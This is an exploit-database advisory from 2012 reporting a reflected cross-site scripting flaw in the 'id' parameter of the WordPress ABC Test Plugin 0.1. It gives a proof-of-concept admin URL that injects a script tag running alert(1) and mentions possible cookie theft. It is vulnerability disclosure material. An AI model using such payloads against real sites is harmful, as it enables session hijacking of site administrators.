id: 19947
date: 12/12/2012
title: WordPress ABC Test Plugin 0.1 Cross Site Script XSS
author: Angel Injection
cves: 

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm Angel Injection member from Inj3ct0r Team          1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
[+] WordPress ABC Test Plugin 0.1 Cross Site Script XSS
[-] Found by Angel Injection
[-] Version: 0.1
[-] Security -::RISK: high
[-] platforms: php
[-] Download Link: http://downloads.wordpress.org/plugin/abc-test.0.1.zip
[-] Link of exploit: http://www.mondounix.com/wordpress-abc-test-0-1-cross-site-scripting/

Xploit

Affected :abctest_config.php

The file abctest_config.php does not sanitize the input from $_GET ['id'] effectively.
This allows a user to launch a cross site scripting attack against this file
may be possible to inject cookie stealing

http://localhost/blog/wp-admin/admin.php?page=abctest&do=edit&id=[xss here]

http://localhost/blog/wp-admin/admin.php?page=abctest&do=edit&id="><script>alert(1)</script>

#  0day.today [2023-03-26]  #